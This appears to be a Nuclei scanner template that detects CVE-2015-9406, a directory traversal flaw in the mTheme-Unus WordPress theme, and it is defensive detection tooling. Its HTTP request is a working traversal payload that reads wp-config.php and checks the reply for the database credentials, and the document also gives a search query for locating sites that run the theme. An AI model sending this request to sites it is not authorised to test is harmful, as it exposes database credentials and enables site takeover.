id: CVE-2015-9406 info: name: mTheme Unus < 2.3 - Directory Traversal author: pussycat0x,dhiyaneshDk severity: high description: | The mTheme-Unus theme for WordPress, prior to version 2.3, contained a directory traversal flaw that let attackers access arbitrary files. This was possible by exploiting the files parameter in css/css.php with .. sequences. impact: | Attackers can read sensitive files including database credentials and configuration files, potentially leading to full site compromise. remediation: Upgrade to 2.3 or later version reference: - https://wpscan.com/vulnerability/d54b6b63-f280-412e-8c8f-17186727ac36/ - https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb/ - https://wpvulndb.com/vulnerabilities/9890 - https://packetstormsecurity.com/files/133778/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-9406 cwe-id: CWE-22 epss-score: 0.55008 epss-percentile: 0.98927 cpe: cpe:2.3:a:mtheme-unus_project:mtheme-unus:*:*:*:*:*:wordpress:*:* metadata: verified: true vendor: mtheme-unus_project product: mtheme-unus framework: wordpress fofa-query: 'body="wp-content/themes/mTheme-Unus/"' tags: cve,cve2015,wordpress,wp-theme,wp,wpscan,mtheme-unus,lfi,vkev,vuln http: - method: GET path: - '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200 # digest: 4a0a004730450221009996a93cc49b30e468aadb04a7edc6c8180f3192372473781b0bd5d406347b0f022021ff127d8c4ca679d300f5f145c759ad9d39c99d21f3def73f9b8b46b8b615c9:922c64590222798bb761d5b6d8e72950